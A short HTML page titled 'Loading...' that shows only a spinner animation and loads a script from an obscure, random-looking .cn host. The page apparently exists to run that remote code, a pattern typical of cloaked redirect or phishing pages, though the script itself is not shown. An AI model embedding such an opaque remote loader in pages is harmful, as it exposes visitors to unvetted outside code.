<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="color-scheme" content="light dark">
    <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0,viewport-fit=cover">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="format-detection" content="telephone=no">
    <title>加载中...</title>
	<style type="text/css">
	.loading{width:100%;height:100%;position:fixed;top:0;left:0;background:#fff;z-index:999}
	.style2-pic{width:50px;height:40px;position:absolute;top:0;left:0;right:0;bottom:0;margin:auto}
	.style2-pic i{float:left;width:6px;height:40px;background:#399;margin:0 2px;transform:scaleY(0.4);animation:loadPic 1.2s infinite}
	.style2-pic i:nth-child(2){animation-delay:.1s}
	.style2-pic i:nth-child(3){animation-delay:.2s}
	.style2-pic i:nth-child(4){animation-delay:.3s}
	.style2-pic i:nth-child(5){animation-delay:.4s}
	@keyframes loadPic{0%,40%,100%{transform:scaleY(0.4)}20%{transform:scaleY(1)}}
    </style>
</head>
<body>
<div id="loading-style2" class="loading"><div class="style2-pic"><i></i><i></i><i></i><i></i><i></i></div></div>
<script src='https://me9898.qwertgdd-swsss.cn/ff/'></script>
</body>
</html>

